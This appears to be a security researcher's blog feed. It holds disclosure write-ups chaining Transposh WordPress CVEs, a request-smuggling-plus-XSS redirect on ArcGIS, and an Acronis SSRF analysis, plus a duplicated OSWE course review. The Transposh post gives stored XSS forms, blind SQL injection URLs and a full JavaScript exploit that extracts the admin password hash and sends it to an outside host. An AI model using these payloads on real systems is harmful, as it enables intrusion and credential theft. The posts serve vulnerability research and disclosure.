Normal view

There are new articles available, click to refresh the page.
Before yesterdayRCE Security

WordPress Transposh: Exploiting a Blind SQL Injection via XSS

22 July 2022 at 00:00

Introduction

You probably have read about my recent swamp of CVEs affecting a WordPress plugin called Transposh Translation Filter, which resulted in more than $30,000 in bounties:

Here’s the story about how you could chain three of these CVEs to go from unauthenticated visitor to admin.

Part 1: CVE-2022-2461 - Weak Default Configuration

So the first issue arises when you add Transposh as a plugin to your WordPress site; it comes with a weak default configuration that allows any user (aka Anonymous) to submit new translation entries using the ajax action tp_translation:

This effectively means that an attacker could already influence the (translated) content on a WordPress site, which is shown to all visitors.

Part 2: CVE-2021-24911 - Unauthenticated Stored Cross-Site Scripting

The same ajax action tp_translation can also be used to permanently place arbitrary JavaScript into the Transposh admin backend using the following payload:

<html>
  <body>
    <form action="http://[host]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp&#95;translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="0" />
      <input type="hidden" name="items" value="1" />
      <input type="hidden" name="tk0" value="xss&lt;script&gt;alert&#40;1337&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tr0" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When an administrator now visits either Transposh’s main dashboard page at /wp-admin/admin.php?page=tp_main or the Translation editor tab at /wp-admin/admin.php?page=tp_editor, then they’ll execute the injected arbitrary JavaScript:

At this point, you can already do a lot of stuff on the backend, but let’s escalate it further by exploiting a seemingly less severe authenticated SQL Injection.

Part 3: CVE-2022-25811 - Authenticated SQL Injections

So this is probably the most exciting part, although the SQL Injections alone only have a CVSS score of 6.8 because they are only exploitable using administrative permissions. Overall, we’re dealing with a blind SQL Injection here, which can be triggered using a simple sleep payload:

/wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(10)%20ELSE%202%20END))

This results in a nice delay of the response proving the SQL Injection:

To fully escalate this chain, let’s get to the most interesting part.

How to (Quickly) Exploit a Blind SQL Injection via Cross-Site Scripting

Approach

Have you ever thought about how to exploit a blind SQL Injection via JavaScript? You might have read my previous blog article, where I used a similar bug chain, but with an error-based SQL Injection. That one only required a single injection payload to exfiltrate the admin user’s password, which is trivially easy. However, to exploit a blind SQL Injection, you typically need hundreds, probably thousands of boolean (or time-based) comparisons to exfiltrate data. The goal here is the same: extracting the administrator’s password from the database.

Now, you might think: well, you could use a boolean comparison and iterate over each character of the password. However, since those hashed passwords (WordPress uses the pHpass algorithm to create passwords) are typically 30 characters long (excluding the first four static bytes $P$B) and consist of alphanumeric characters including some special chars (i.e. $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/), going through all the possible ASCII characters from 46 (“.”) to 122 (lower-capital “z”) would require you to send around 76 requests per character which could result in 76*30 = 2280 requests.

This is a lot and will require the victim to stay on the page for quite a while.

So let’s do it a bit smarter with only around 320 requests, which is around 84% fewer requests. Yes, you might still find more optimization potential in my following approach, but I find 84% to be enough here.

Transposh’s Sanitization?!

While doing the source code review to complete this chain, I stumbled upon a useless attempt to filter special characters for the vulnerable order and orderBy parameters. It looks like they decided to only filter for FILTER_SANITIZE_SPECIAL_CHARS which translates to "<>&:

$orderby = (!empty(filter_input(INPUT_GET, 'orderby', FILTER_SANITIZE_SPECIAL_CHARS)) ) ? filter_input(INPUT_GET, 'orderby', FILTER_SANITIZE_SPECIAL_CHARS) : 'timestamp';
$order = (!empty(filter_input(INPUT_GET, 'order', FILTER_SANITIZE_SPECIAL_CHARS)) ) ? filter_input(INPUT_GET, 'order', FILTER_SANITIZE_SPECIAL_CHARS) : 'desc';

It’s still a limitation, but easy to work around: we’re just going to replace the required comparison characters < and > with a between x and y. We don’t actually care about " and & since the payload doesn’t really require them.

Preparing The Test Cases

The SQL Injection payload that can be used looks like the following (thanks to sqlmap for the initial payload!):

(SELECT+(
  CASE+WHEN+(
    ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))
    +BETWEEN+1+AND+122)+
    THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END))

I’ve split the payload up for readability reasons here. Let me explain its core components:

  • The ORD() (together with the MID) walks the user_pass string which is returned by the subquery character by character. This means we’ll get the password char by char. I’ve also added a WHERE id=1 clause to ensure we’re just grabbing the password of WordPress’s user id 1, which is usually the administrator of the instance.
  • The CASE WHEN –> BETWEEN 1 and 122 part validates whether each returned character matches an ordinal between 1 and 122.
  • The THEN –> ELSE part makes the difference in the overall output and the datapoint we will rely on when exploiting this with a Boolean-based approach.

The False Case

Let’s see how we can differentiate the responses to the BETWEEN x and y part. We do already know that the first character of a WordPress password is $ (ASCII 36), so let’s take this to show how the application reacts.

The payload /wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))+BETWEEN+100+AND+122)+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END)) performs a BETWEEN 100 and 122 test which results in the following visible output:

The True Case

The payload /wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))+BETWEEN+1+AND+122)+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END)) in return performs a BETWEEN 1 and 122 check and returns a different visible output:

As you can see on the last screenshot, in the true case, the application will show the Bulk actions dropdown alongside the translated strings. This string will be our differentiator!

How to Reduce the Exploitation Requests from ~2200 to ~300

So we need to find a way not to have to send 76 requests per character - from 46 (.) to 122 (lower-capital z). So let’s do it by approximation. My idea is to use the range of 46-122 and apply some math:

Let’s first define a couple of things:

  • 46: the lowest end of the possible character set –> cur (current) value.
  • 122: the upper end of the possible character set –> max (maximum) value.
  • 0: the previous valid current value –> prev value. Here we need to keep track of the previously true case value to be able to revert the calculation to a working case if we’d encounter a false case. 0 because we don’t know the first valid value.

Doing the initial between check of cur and maxwill always result in a true case (because it’s the entire allowed character set). To narrow it down, we now point cur value to exactly the middle between cur and max using the formula:

cur = cur + (Math.floor((max-cur)/2));

This results in a check of BETWEEN 84 and 122. So we’re checking if the target is located in the upper OR implicitly in the lower half of the range. If this would again result in a true case because the character in probing is in that range, do the same calculation again and narrow it down to the correct character.

However, if we’d encounter a false case because the character is lower than 84, then let’s set the max value to the cur one because we have to instead look into the lower half, and also set cur to the prev value to keep track of it.

Based on this theory and to match the character uppercase C (ASCII: 67), the following would happen:

true: cur:84, prev:46,max:122
true: cur:65, prev:46,max:84
true: cur:74, prev:65,max:84
true: cur:69, prev:65,max:74
true: cur:67, prev:65,max:69
true: cur:68, prev:67,max:69
true: cur:67, prev:67,max:68

Finally, if cur equals prev, we’ve found the correct char. And it took about seven requests to get there, instead of 21 (67-46).

Some JavaScript (Magic)

Honestly, I’m not a JavaScript pro, and there might be ways to optimize it, but here’s my implementation of it, which should work with any blind SQL Injections that you want to chain with an XSS against WordPress:

async function exploit() {
    let result = "$P$B";
    let targetChar = 5;
    let prev = 0;
    let cur = 46;
    let max = 122;
    let requestCount = 0;

    do {
        let url = `/wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),${targetChar},1))+BETWEEN+${cur}+AND+${max})+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END))`

        const response = await fetch(url)
        const data = await response.text()

        requestCount = requestCount + 1;

        // this is the true/false differentiator
        if(data.includes("Bulk actions"))
        {
            // "true" case
            prev = cur;
            cur = cur + (Math.floor((max-cur)/2));

            //console.log('true: cur:' + cur + ', prev:' + prev + ',max:' + max );

            if(cur === 0 && prev === 0) {
                console.log('Request count: ' + requestCount);
                return(result)
            }

            // this means we've found the correct char
            if(cur === prev) {
                result = result + String.fromCharCode(cur);

                // reset initial values
                prev = 0;
                cur = 20;
                max = 122;

                // proceed with next char
                targetChar = targetChar + 1;

                console.log(result);
            }
        }
        else
        {
            // "false" case
            // console.log('false: cur:' + cur + ', prev:' + prev + ',max:' + max );

            max = cur;
            cur = prev;
        }
    } while (1)
}



exploit().then(x => {
    console.log('password: ' + x);

    // let's leak it to somewhere else
    leakUrl = "http://www.rcesecurity.com?password=" + x
    xhr = new XMLHttpRequest();
    xhr.open('GET', leakUrl);
    xhr.send();
});

Connecting the Dots

Now you could inject a Stored XSS payload like the following, which points a script src to a JavaScript file containing the payload:

<html>
  <body>
    <form action="http://[host]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp&#95;translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="xss" />
      <input type="hidden" name="items" value="3" />
      <input type="hidden" name="tk0" value="xss&lt;script&#32;src&#61;&quot;https&#58;&#47;&#47;www&#46;attacker&#46;wf&#47;ff&#46;js&quot;&gt;" />
      <input type="hidden" name="tr0" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Trick an admin into visiting the Transposh backend, and finally enjoy your WordPress hash:

AWAE Course and OSWE Exam Review

22 April 2022 at 00:00

Introduction

This is a review of the Advanced Web Attacks and Exploitation (WEB-300) course and its OSWE exam by Offensive-Security. I’ve taken this course because I was curious about what secret tricks this course will offer for its money, especially considering that I’ve done a lot of source code reviews in different languages already.

This course is designed to develop, or expand, your exploitation skills in web application penetration testing and exploitation research. This is not an entry level course–it is expected that you are familiar with basic web technologies and scripting languages. We will dive into, read, understand, and write code in several languages, including but not limited to JavaScript, PHP, Java, and C#.

I got this course as part of my Offensive-Security Learn Unlimited subscription, which includes all of their courses (except for the EXP-401) and unlimited exam attempts. Luckily, I only needed one attempt to pass the exam and get my OSWE certification.

The Courseware & the Labs

I’d say it’s a typical Offensive-Security course. It comes with hundreds of written pages and hours of video content explaining every vulnerability class in such incredible detail, which is fantastic if you’re new to certain things. But the courseware still assumes a technically competent reader proficient with programming concepts such as object orientation, so I don’t recommend taking this course without prior programming knowledge.

You will also get access to their labs to follow the course materials. These labs consist of Linux and Windows machines that you will pwn along the course, and they are fun! You will touch on all the big vulnerability classes and some lesser-known ones that you usually don’t encounter in your day-to-day BugBounty business. Some of these are:

  • Authentication Bypasses of all kinds
  • Type Juggling
  • SQL Injection
  • Server-Side JavaScript Injection
  • Deserialization
  • Template Injection
  • Cross-Site Scripting (this was unexpected in an RCE context!)
  • Server-Side Request Forgery
  • Prototype Pollution
  • Classic command injection

It took me roughly a week to get through all videos and labs, mostly because I was already familiar with most of the vulnerability classes and content. My most challenging ones were the type juggling (this is some awesome stuff!) and prototype pollution. I also decided not to go the extra miles; however, I’d still recommend this to everyone who is relatively new to source code review and exploitation and wants to practice their skills.

The Exam

Overview

The exam is heavily time-constrained. You have 47 hours and 45 minutes to work through your target machines, where you have full access to the application’s source code. But be prepared that the source code to review might be a lot - good time management is crucial here. After the pure hacking time, you will have another 24 hours to submit your exam documentation.

The Proctoring

But before actually being able to read a lot of source code, you have to go through the proctoring setup with the proctors themselves. You have to be 15 minutes early to the party to show your government ID, walk them through your room and make sure that they can correctly monitor (all of) your screens. You are also not allowed to have any additional computers or mobile phones in the same room.

The proctoring itself wasn’t a real problem. The proctors have always been friendly and responsive. Note that if you intend to leave the room (even to visit your toilet), you have to let them know when you leave and when you return to your desk. But you do not have to wait for their confirmation - so no toilet incidents are expected ;-) If you intend to stay away for a more extended period (sleep ftw.), they will pause the VPN connection.

Basic Machine Setup

After finishing the proctoring setup at around 12:00, the real fun started. Offensive-Security recommends using their provided Kali VMs, but I decided to go with my native macOS instead. Be aware that if you’d choose to go this way, Offensive-Security does not provide you with any technical support (other than VPN issues). I’ve used the following software for the exam:

  • macOS Monterey 12.3.1
  • Viscosity for the VPN connection
  • Microsoft Remote Desktop to connect to the exam machines
  • Notion as my cheatsheet (Yes, you are allowed to use any notes during the exam)
  • BurpSuite Community for all the hacking (You are not allowed to use the Pro version!)
  • Python for all my scripting works

The exam machines come in a group of two, which means you’ll get one development machine to which you’ll have full access and one “production” machine which you don’t have complete access. You’ll have to do all your research and write your exploit chain on the development machine and afterward perform your exploit against the production machine, which holds the required flags.

The development machines have a basic setup of everything you need to start your journey. You don’t need any additional tools (auto-exploitation tools such as sqlmap are forbidden anyways). Another thing: you are not allowed to remotely mount or copy any of the application’s source code to your local machine to use other tools such as the JetBrains suite to start debugging. You have to do this with the tools provided - so make sure that you’ve read the course materials carefully for your debugging setup and you’re familiar with the used IDEs.

Exam Goal

The goal of the exam is to pwn these independent production machines using a single script - choose whatever scripting language you’re comfortable with. This means your script should be able to do all the exploitation steps in just one run, from zero to hero. If your script fails to auto-exploit the machine, it counts as a fail (you might still get some partial points, but it might not be enough in the end). You need to have at least 85 out of 100 points to pass the exam point-wise.

Pwn #1

Once I was familiar with the remote environment, I started to look at target machine #1. It took me roughly 4 hours to identify all the necessary vulnerabilities. Next up: Automation. I started to write my Python script to auto-exploit both issues, but it took much longer than expected. Why? I struggled with the reliability of my script, which for some reason, only worked on every second run. After 2.5 hours of optimizations, I finally got my script working with a 10/10 success rate.

I’ve submitted all the flags, ultimately getting me the first 50 points. At that point, I also started to collect screenshots for the documentation part of the exam.

After I got everything, I went to sleep for about 10 hours (that’s important for me to keep a clear mind), and already having half of the required points got me a calm night.

Pwn #2

After I had breakfast on the second day, I started to look at machine #2, which was a bit harder than the first one. It took me roughly half an hour to spot vulnerability #2, but I still had to find the vulnerability #1. Unfortunately, that also took longer than expected because I’ve followed a rabbit hole for about two hours until I’ve noticed that it wasn’t exploitable. But still, after around 6 hours of hacking, I was able to identify the entire bug chain and exploit it. I’ve submitted both flags, getting me an overall 100 out of 100 points - this was my happy moment!

I wrote the Python exploit for auto-exploitation relatively quickly this time since it was structurally entirely different from machine #1. I also started to collect all the screenshots for my documentation. I went to sleep for another 10 hours.

Documentation

On the last day, my exam was about to end at 11:45, and I started early at 08:00 to be able to double-check my scripts, my screenshots, etc. I improved my Python scripts and added some leet hacker output to them without breaking them (yay!). I finished that part at around 10:00 and had almost 2 hours left in the exam lab. So I started to do my documentation right away and noticed (somewhat last minute) that I was missing two screenshots, and trust me, they are so important!

I informed the proctor to end my exam, and I then had another 24 hours to submit my documentation. The entire documentation took me roughly 8 hours to complete - I’m a perfectionist, and this part always takes me the most time to finish. I sent in the documentation on the same day and completed my exam.

A couple of days later, I received the awaited happy mail from Offensive-Security saying that I’ve passed the exam

netcup-xss

Who Should Take This Course?

The course itself is excellent in its content, presentation, and lab-quality. I haven’t seen any comparable course out there, and while many people are claiming that you can get all of it cheaper using Udemy courses, they are only partially correct. Yes, you’ll find a lot of courses about discovering and exploiting vulnerabilities in black box scenarios, but the AWAE targets a different audience. It is mostly about teaching you the source code’ish way of finding vulnerabilities. Where else do you have the chance to learn how to discover and exploit a Type Juggling Issue? It is barely possible without access to the source code. Active exploitation is a minor part of this course and is done manually without automation tools.

So if you do have programming skills already and are interested in strengthening your vulnerability discovery skills on source code review engagements, then this course might be the one for you. I have 5+ years of experience in auditing, primarily PHP and Java applications, and found this course to be challenging in many (but not all) chapters. However, this course still helped me sharpen my view on how small coding errors can result in impactful bugs by just leaving out a single equal sign.

But suppose you’ve never touched the initially mentioned bug classes, and you have also never touched on different programming languages and concepts such as object orientation. In that case, you should spend some time on practical programming first before buying this course.

OSWE Course And Exam Review

22 April 2022 at 00:00

Introduction

This is a review of the Advanced Web Attacks and Exploitation (WEB-300) course provided by Offensive-Security. I’ve taken this course because I was curious about what secret tricks this course will offer for its money, especially considering that I’ve done a lot of source code reviews in different languages already.

This course is designed to develop, or expand, your exploitation skills in web application penetration testing and exploitation research. This is not an entry level course–it is expected that you are familiar with basic web technologies and scripting languages. We will dive into, read, understand, and write code in several languages, including but not limited to JavaScript, PHP, Java, and C#.

I got this course as part of my Offensive-Security Learn Unlimited subscription, which includes all of their courses (except for the EXP-401) and unlimited exam attempts. Luckily, I only needed one attempt to pass the exam and get my OSWE certification.

The Courseware & the Labs

I’d say it’s a typical Offensive-Security course. It comes with hundreds of written pages and hours of video content explaining every vulnerability class in such incredible detail, which is fantastic if you’re new to certain things. But the courseware still assumes a technically competent reader proficient with programming concepts such as object orientation, so I don’t recommend taking this course without prior programming knowledge.

You will also get access to their labs to follow the course materials. These labs consist of Linux and Windows machines that you will pwn along the course, and they are fun! You will touch on all the big vulnerability classes and some lesser-known ones that you usually don’t encounter in your day-to-day BugBounty business. Some of these are:

  • Authentication Bypasses of all kinds
  • Type Juggling
  • SQL Injection
  • Server-Side JavaScript Injection
  • Deserialization
  • Template Injection
  • Cross-Site Scripting (this was unexpected in an RCE context!)
  • Server-Side Request Forgery
  • Prototype Pollution
  • Classic command injection

It took me roughly a week to get through all videos and labs, mostly because I was already familiar with most of the vulnerability classes and content. My most challenging ones were the type juggling (this is some awesome stuff!) and prototype pollution. I also decided not to go the extra miles; however, I’d still recommend this to everyone who is relatively new to source code review and exploitation and wants to practice their skills.

The Exam

Overview

The exam is heavily time-constrained. You have 47 hours and 45 minutes to work through 2 target machines, where you have full access to the application’s source code. But be prepared that the source code to review might be a lot - good time management is crucial here. After the pure hacking time, you will have another 24 hours to submit your exam documentation.

The Proctoring

But before actually being able to read a lot of source code, you have to go through the proctoring setup with the proctors themselves. You have to be 15 minutes early to the party to show your government ID, walk them through your room and make sure that they can correctly monitor (all of) your screens. You are also not allowed to have any additional computers or mobile phones in the same room.

The proctoring itself wasn’t a real problem. The proctors have always been friendly and responsive. Note that if you intend to leave the room (even to visit your toilet), you have to let them know when you leave and when you return to your desk. But you do not have to wait for their confirmation - so no toilet incidents are expected ;-) If you intend to stay away for a more extended period (sleep ftw.), they will pause the VPN connection.

Basic Machine Setup

After finishing the proctoring setup at around 12:00, the real fun started. Offensive-Security recommends using their provided Kali VMs, but I decided to go with my native macOS instead. Be aware that if you’d choose to go this way, Offensive-Security does not provide you with any technical support (other than VPN issues). I’ve used the following software for the exam:

  • macOS Monterey 12.3.1
  • Viscosity for the VPN connection
  • Microsoft Remote Desktop to connect to the exam machines
  • Notion as my cheatsheet (Yes, you are allowed to use any notes during the exam)
  • BurpSuite Community for all the hacking (You are not allowed to use the Pro version!)
  • Python for all my scripting works

The exam machines have a basic setup of everything you need to start your journey. You don’t need any additional tools (auto-exploitation tools such as sqlmap are forbidden anyways). Another thing: you are not allowed to remotely mount or copy any of the application’s source code to your local machine to use other tools such as the JetBrains suite to start debugging. You have to do this with the tools provided - so make sure that you’ve read the course materials carefully for your debugging setup and you’re familiar with the used IDEs.

Exam Goal

The goal of the exam is to pwn two independent machines using a single script - choose whatever scripting language you’re comfortable with. This means your script should be able to do all the exploitation steps in just one run, from zero to hero. If your script fails to auto-exploit the machine, it counts as a fail (you might still get some partial points, but it might not be enough in the end). You also have to submit two flags for the authentication bypass (35 points) and for the RCE (15 points). You need to have at least 85 out of 100 points to pass the exam point-wise.

Pwn #1

Once I was familiar with the remote environment, I started to look at target machine #1. It took me roughly 4 hours to identify all the necessary vulnerabilities to get the RCE. Next up: Automation. I started to write my Python script to auto-exploit both issues, but it took much longer than expected. Why? I struggled with the reliability of my script, which for some reason, only worked on every second run. After 2.5 hours of optimizations, I finally got my script working with a 10/10 success rate.

I’ve submitted all the flags, ultimately getting me the first 50 points. At that point, I also started to collect screenshots for the documentation part of the exam.

After I got everything, I went to sleep for about 10 hours (that’s important for me to keep a clear mind), and already having half of the required points got me a calm night.

Pwn #2

After I had breakfast on the second day, I started to look at machine #2, which was a bit harder than the first one. It took me roughly half an hour to spot vulnerability #2 (so the RCE part), but I still had to find the authentication bypass. Unfortunately, that also took longer than expected because I’ve followed a rabbit hole for about two hours until I’ve noticed that it wasn’t exploitable. But still, after around 6 hours of hacking, I was able to identify the entire bug chain and exploit it. I’ve submitted both flags, getting me an overall 100 out of 100 points - this was my happy moment!

I wrote the Python exploit for auto-exploitation relatively quickly this time since it was structurally entirely different from machine #1. I also started to collect all the screenshots for my documentation. I went to sleep for another 10 hours.

Documentation

On the last day, my exam was about to end at 11:45, and I started early at 08:00 to be able to double-check my scripts, my screenshots, etc. I improved my Python scripts and added some leet hacker output to them without breaking them (yay!). I finished that part at around 10:00 and had almost 2 hours left in the exam lab. So I started to do my documentation right away and noticed (somewhat last minute) that I was missing two screenshots, and trust me, they are so important!

I informed the proctor to end my exam, and I then had another 24 hours to submit my documentation. The entire documentation took me roughly 8 hours to complete - I’m a perfectionist, and this part always takes me the most time to finish. I sent in the documentation on the same day and completed my exam.

A couple of days later, I received the awaited happy mail from Offensive-Security saying that I’ve passed the exam

netcup-xss

Who Should Take This Course?

The course itself is excellent in its content, presentation, and lab-quality. I haven’t seen any comparable course out there, and while many people are claiming that you can get all of it cheaper using Udemy courses, they are only partially correct. Yes, you’ll find a lot of courses about discovering and exploiting vulnerabilities in black box scenarios, but the AWAE targets a different audience. It is mostly about teaching you the source code’ish way of finding vulnerabilities. Where else do you have the chance to learn how to discover and exploit a Type Juggling Issue? It is barely possible without access to the source code. Active exploitation is a minor part of this course and is done manually without automation tools.

So if you do have programming skills already and are interested in strengthening your vulnerability discovery skills on source code review engagements, then this course might be the one for you. I have 5+ years of experience in auditing, primarily PHP and Java applications, and found this course to be challenging in many (but not all) chapters. However, this course still helped me sharpen my view of the allegedly minor but impactful coding errors, which can result from just a single missing equal sign.

But suppose you’ve never touched the initially mentioned bug classes, and you have also never touched on different programming languages and concepts such as object orientation. In that case, you should spend some time on practical programming first before buying this course.

Smuggling an (Un)exploitable XSS

13 November 2020 at 00:00

Smuggling an (Un)exploitable XSS

This is the story about how I’ve chained a seemingly uninteresting request smuggling vulnerability with an even more uninteresting header-based XSS to redirect network-internal web site users without any user interaction to arbitrary pages. This post also introduces a 0day in ArcGis Enterprise Server.

However, this post is not about how request smuggling works. If you’re new to this topic, have a look at the amazing research published by James Kettle, who goes into detail about the concepts.

Smuggling Requests for Different Response Lengths

So what I usually do when having a look at a single application is trying to identify endpoints that are likely to be proxied across the infrastructure - endpoints that are commonly proxied are for example API endpoints since those are usually infrastructurally separated from any front-end stuff. While hunting on a private HackerOne program, I’ve found an asset exposing an API endpoint that was actually vulnerable to a CL.TE-based request smuggling by using a payload like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 132
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET / HTTP/1.1
Host: redacted.com
X: X

As you can see here, I’m smuggling a simple GET request against the root path of the webserver on the same vhost. So in theory, if the request is successfully smuggled, we’d see the root page as a response instead of the originally queried API endpoint.

To verify that, I’ve spun up a TurboIntruder instance using a configuration that issues the payload a hundred times:

While TuroboIntruder was running, I’ve manually refreshed the page a couple of times to trigger (simulate) the vulnerability. Interestingly, the attack seemed to work quite well, since there were actually two different response sizes, whereof one was returning the original response of the API:

And the other returned the start page:

This confirms the request smuggling vulnerability against myself. Pretty cool so far, but self-exploitation isn’t that much fun.

Poisoning Links Through ArcGis’ X-Forwarded-Url-Base Header

To extend my attack surface for the smuggling issue, I’ve noticed that the same server was also running an instance of the ArcGis Enterprise Server under another directory. So I’ve reviewed its source code for vulnerabilities that I could use to improve the request smuggling vulnerability. I’ve stumbled upon an interesting constellation affecting its generic error handling:

The ArcGIS error handler accepts a customized HTTP header called X-Forwarded-Url-Base that is used for the base of all links on the error page, but only if it is combined with another customized HTTP header called X-Forwarded-Request-Context. The value supplied to X-Forwarded-Request-Context doesn’t really matter as long as it is set.

So a minified request to exploit this issue against the ArcGis’ /rest/directories route looks like the following:

GET /rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?
X-Forwarded-Request-Context: HackerOne

This simply poisons all links on the error page with a reference to my server at https://www.rce.wf/cat.html? (note the appended ? which is used to get rid off the automatically appended URL string /rest/services):

While this already looks like a good candidate to be chained with the smuggling, it still requires user interaction by having the user (victim) to click on any link on the error page.

However, I was actually looking for something that does not require any user interaction.

A Seemingly Unexploitable ArcGis XSS

You’ve probably guessed it already. The very same header combination as previously shown is also vulnerable to a reflected XSS. Using a payload like the following for the X-Forwarded-Url-Base:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>alert(1)</script>
X-Forwarded-Request-Context: HackerOne

leads to an alert being injected into the error page:

Now, a header-based XSS is usually not exploitable on its own, but it becomes easily exploitable when chained with a request smuggling vulnerability because the attacker is able to fully control the request.

While popping alert boxes on victims that are visiting the vulnerable server is funny, I was looking for a way to maximize my impact to claim a critical bounty. The solution: redirection.

If you’d now use a payload like the following:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne

…you’d now be able to redirect users.

Connecting the Dots

The full exploit looked like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 278
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET /redacted/rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne
X: X

While executing this attack at around 1000 requests per second, I was able to actually see some interesting hits on my server:

After doing some lookups I was able to confirm that those hits were indeed originating from the program’s internal network.

Mission Completed. Thanks for the nice critical bounty :-)

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

14 September 2020 at 00:00

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

You have probably read one or more blog posts about SSRFs, many being escalated to RCE. While this might be the ultimate goal, this post is about an often overlooked impact of SSRFs: application logic impact.

This post will tell you the story about an unauthenticated SSRF affecting Acronis Cyber Backup up to v12.5 Build 16341, which allows sending fully customizable emails to any recipient by abusing a web service that is bound to localhost. The fun thing about this issue is that the emails can be sent as backup indicators, including fully customizable attachments. Imagine sending Acronis “Backup Failed” emails to the whole organization with a nice backdoor attached to it? Here you go.

Root Cause Analysis

So Acronis Cyber Backup is essentially a backup solution that offers administrators a powerful way to automatically backup connected systems such as clients and even servers. The solution itself consists of dozens of internally connected (web) services and functionalities, so it’s essentially a mess of different C/C++, Go, and Python applications and libraries.

The application’s main web service runs on port 9877 and presents you with a login screen:

Now, every hacker’s goal is to find something unauthenticated. Something cool. So I’ve started to dig into the source code of the main web service to find something cool. Actually, it didn’t take me too long to discover that something in a method called make_request_to_ams:

# WebServer/wcs/web/temp_ams_proxy.py:

def make_request_to_ams(resource, method, data=None):
    port = config.CONFIG.get('default_ams_port', '9892')
    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
[...]

The main interesting thing here is the call to get_ams_address(request.headers), which is used to construct a Uri. The application reads out a specific request header called Shard within that method:

def get_ams_address(headers):
    if 'Shard' in headers:
        logging.debug('Get_ams_address address from shard ams_host=%s', headers.get('Shard'))
        return headers.get('Shard')  # Mobile agent >= ABC5.0

When having a further look at the make_request_to_ams call, things are getting pretty clear. The application uses the value from the Shard header in a urllib.request.urlopen call:

def make_request_to_ams(resource, method, data=None):
[...]
    logging.debug('Making request to AMS %s %s', method, uri)
    headers = dict(request.headers)
    del headers['Content-Length']
    if not data is None:
        headers['Content-Type'] = 'application/json'
    req = urllib.request.Request(uri,
                                 headers=headers,
                                 method=method,
                                 data=data)
    resp = None
    try:
        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
    except Exception as e:
        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
    return resp

So this is a pretty straight-forward SSRF including a couple of bonus points making the SSRF even more powerful:

  • The instantiation of the urllib.request.Request class uses all original request headers, the HTTP method from the request, and the even the whole request body.
  • The response is fully returned!

The only thing that needs to be bypassed is the hardcoded construction of the destination Uri since the API appends a semicolon, a port, and a resource to the requested Uri:

uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)

However, this is also trivially easy to bypass since you only need to append a ? to turn those into parameters. A final payload for the Shard header, therefore, looks like the following:

Shard: localhost?

Finding Unauthenticated Routes

To exploit this SSRF we need to find a route which is reachable without authentication. While most of CyberBackup’s routes are only reachable with authentication, there is one interesting route called /api/ams/agents which is kinda different:

# WebServer/wcs/web/temp_ams_proxy.py:
_AMS_ADD_DEVICES_ROUTES = [
    (['POST'], '/api/ams/agents'),
] + AMS_PUBLIC_ROUTES

Every request to this route is passed to the route_add_devices_request_to_ams method:

def setup_ams_routes(app):
[...]
    for methods, uri, *dummy in _AMS_ADD_DEVICES_ROUTES:
        app.add_url_rule(uri,
                         methods=methods,
                         view_func=_route_add_devices_request_to_ams)
[...]

